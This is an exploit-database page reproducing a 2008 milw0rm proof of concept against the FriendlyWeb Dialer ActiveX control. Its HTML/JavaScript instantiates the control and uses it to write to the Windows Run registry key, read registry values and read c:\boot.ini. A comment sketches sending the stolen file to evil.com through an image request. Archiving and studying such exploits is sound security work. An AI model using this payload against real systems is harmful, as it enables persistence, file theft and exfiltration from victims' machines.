header-logo
Suggest Exploit
vendor:
FriendlyWeb Dialer
by:
milw0rm.com
8.8
CVSS
HIGH
Read/Write Registry
264
CWE
Product Name: FriendlyWeb Dialer
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Friendly Technologies – Read/Write Registry

This exploit allows an attacker to read and write to the registry and also read files. The exploit uses the FT.RegistryValue and FT.GetTextFile functions to read and write to the registry and read files respectively.

Mitigation:

The user should ensure that the registry is not accessible to malicious actors and that the system is regularly updated with the latest security patches.
Source

Exploit-DB raw data:

<!-- 
Proof of Concept...
Read write to registry
and also read files

More codes at irc.nix.co.il/#binaryvision !
-->

<html>
<title>Friendly Technologies - Read/Write Registry</title>
<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='FT'></object>

<script language='Javascript'>
// Write to Registry
FT.RegistryValue (1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Key Name Here", 1) = "Input Here";

// Read from Registry
var readreg = FT.RegistryValue (1, "SOFTWARE\\Friendly Technologies\\FriendlyWeb Dialer", "Version", 1);
alert(readreg);

// Read from file
var readme=FT.GetTextFile("c:\\boot.ini");
alert(readme); // <img src="http://evil.com/postfiles.php?input="+readme ...
</script>

# milw0rm.com [2008-08-30]